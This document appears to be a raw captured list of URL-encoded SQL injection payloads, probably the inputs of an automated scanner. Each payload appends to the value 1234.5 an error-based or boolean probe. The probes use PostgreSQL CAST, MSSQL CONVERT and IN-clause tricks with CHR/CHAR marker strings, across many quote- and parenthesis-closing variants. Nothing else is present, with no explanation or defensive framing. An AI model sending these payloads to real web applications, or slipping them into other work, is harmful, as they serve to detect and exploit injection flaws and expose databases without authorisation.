1234.5%20%2B%20%28SELECT%205974%20WHERE%202968%3D2968%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27wSMV%27%20FROM%20DUAL%20WHERE%204838%3D4838%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27hJUJ%27%20WHERE%208789%3D8789%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%202704%3DCAST%28CHR%2858%29%7C%7CCHR%28103%29%7C%7CCHR%2898%29%7C%7CCHR%28120%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282704%3D2704%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7CCHR%2858%29%7C%7CCHR%28101%29%7C%7CCHR%28110%29%7C%7CCHR%2898%29%7C%7CCHR%2858%29%20AS%20NUMERIC%29%20%23 1234.5%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%22%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%287616%3D7616 1234.5%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%287975%3D7975 1234.5%29%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%287742%3D7742 1234.5%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27VmTW%27%3D%27VmTW 1234.5%27%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27JtPY%27%3D%27JtPY 1234.5%27%29%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27FHbA%27%3D%27FHbA 1234.5%27%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27xPIX%27%3D%27xPIX 1234.5%27%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27kdgE%27%20LIKE%20%27kdgE 1234.5%27%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27RQag%27%20LIKE%20%27RQag 1234.5%27%29%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27wgUL%27%20LIKE%20%27wgUL 1234.5%27%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27wCZj%27%20LIKE%20%27wCZj 1234.5%22%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22sAaI%22%3D%22sAaI 1234.5%22%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22kLiO%22%3D%22kLiO 1234.5%22%29%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22FOAy%22%3D%22FOAy 1234.5%22%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22DXVy%22%3D%22DXVy 1234.5%22%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22kQQA%22%20LIKE%20%22kQQA 1234.5%22%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22pAeC%22%20LIKE%20%22pAeC 1234.5%22%29%29%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22krnN%22%20LIKE%20%22krnN 1234.5%22%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22BGfa%22%20LIKE%20%22BGfa 1234.5%29%20WHERE%204493%3D4493%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%29%20WHERE%205563%3D5563%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%20WHERE%208102%3D8102%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%22%20WHERE%209645%3D9645%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%20%7C%7C%20%28SELECT%209326%20FROM%20DUAL%20WHERE%201220%3D1220%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208386%20WHERE%208784%3D8784%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203817%20FROM%20DUAL%20WHERE%207462%3D7462%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29 1234.5%20%2B%20%28SELECT%205075%20WHERE%208993%3D8993%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27HQts%27%20FROM%20DUAL%20WHERE%201870%3D1870%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27xZpv%27%20WHERE%202692%3D2692%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%206749%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%286749%3D6749%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20%23 1234.5%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%22%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%285003%3D5003 1234.5%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%288804%3D8804 1234.5%29%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%286826%3D6826 1234.5%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29 1234.5%27%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27gQPa%27%3D%27gQPa 1234.5%27%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27ftGp%27%3D%27ftGp 1234.5%27%29%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27nTWu%27%3D%27nTWu 1234.5%27%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27dDor%27%3D%27dDor 1234.5%27%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%27VzBz%27%20LIKE%20%27VzBz 1234.5%27%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%27dwOI%27%20LIKE%20%27dwOI 1234.5%27%29%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%27xecA%27%20LIKE%20%27xecA 1234.5%27%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%27VWZD%27%20LIKE%20%27VWZD 1234.5%22%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%22vJWK%22%3D%22vJWK 1234.5%22%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%22RRQd%22%3D%22RRQd 1234.5%22%29%29%29%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%28%28%28%22UHmh%22%3D%22UHmh 1234.5%22%20AND%203593%20IN%20%28%28CHAR%2858%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28120%29%2BCHAR%2858%29%2B%28SELECT%20%28CASE%20WHEN%20%283593%3D3593%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%2898%29%2BCHAR%2858%29%29%29%20AND%20%22djpG%22%3D%22djpG 